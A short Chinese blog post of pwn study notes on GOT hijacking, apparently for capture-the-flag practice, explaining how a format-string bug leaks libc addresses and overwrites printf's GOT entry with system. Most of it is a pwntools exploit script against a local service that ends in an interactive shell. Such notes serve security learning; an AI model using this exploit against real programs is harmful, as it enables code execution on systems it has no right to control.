Pwn_11 Got 劫持

比如说 把puts(str)的.got.plt的地址的值改为system函数地址

格式化字符串的综合利用

  • 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址
  • 利用libc基地址+偏移地址 可以知道其他函数地址
  • 利用任意地址写入,从而配合got hijacking更改已有函数地址

  
from pwn import *

r = remote('127.0.0.1',4000)

libc_start_got = 0x804a01c
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc_offsset = libc.symbols['__libc_start_main']

r.sendline(p32(libc_start_got)+'#'+'%5$s'+'#')

r.recvuntil('#')
libc_base = u32(r.recvuntil('#')[:4]) - libc_offsset

printf_got = 0x804a00c
system_off = libc.symbols['system']
system = libc_base + system_off

r.sendline(fmtstr_payload(5,{printf_got:system}))

r.interactive()

 

posted @ 2018-03-08 21:58  歇马  阅读(646)  评论(0编辑  收藏  举报